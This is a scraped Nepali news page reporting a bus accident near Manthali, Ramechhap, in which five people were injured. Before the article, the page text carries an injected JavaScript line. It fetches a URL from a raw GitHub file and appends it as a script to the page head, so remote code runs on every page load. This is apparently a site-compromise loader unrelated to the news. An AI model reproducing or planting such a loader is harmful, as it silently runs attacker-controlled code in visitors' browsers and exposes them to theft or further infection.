;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
फागुन ०७ रामेछाप । रामेछापको मन्थलीमा बस दुर्घटनामा परेकाे छ । दुर्घटनामा ५ जना घाइते भएका छन् । सालुबाट आएकाे अरनिको बस शुक्रबार बिहान दुर्घटनामा परेकाे हाे । घाइतेहरुकाे अवस्था सामान्य रहेकाे स्राेतले जनाएकाे छ। राष्ट्रपति रनिङशिल्ड प्रतियोगितामा भाग लीन खेलाडी बाेकेर मन्थली तर्फ आउदै गरेकाे बस मन्थली नजिकै मच्छेडाडी भन्ने स्थानमा बस दुर्घटनामा परेकाे हाे । घटना बारे थप जानकारी आउन बाँकी छ। थप केही बेरमा….. ।
फेसबुक प्रतिक्रियाहरु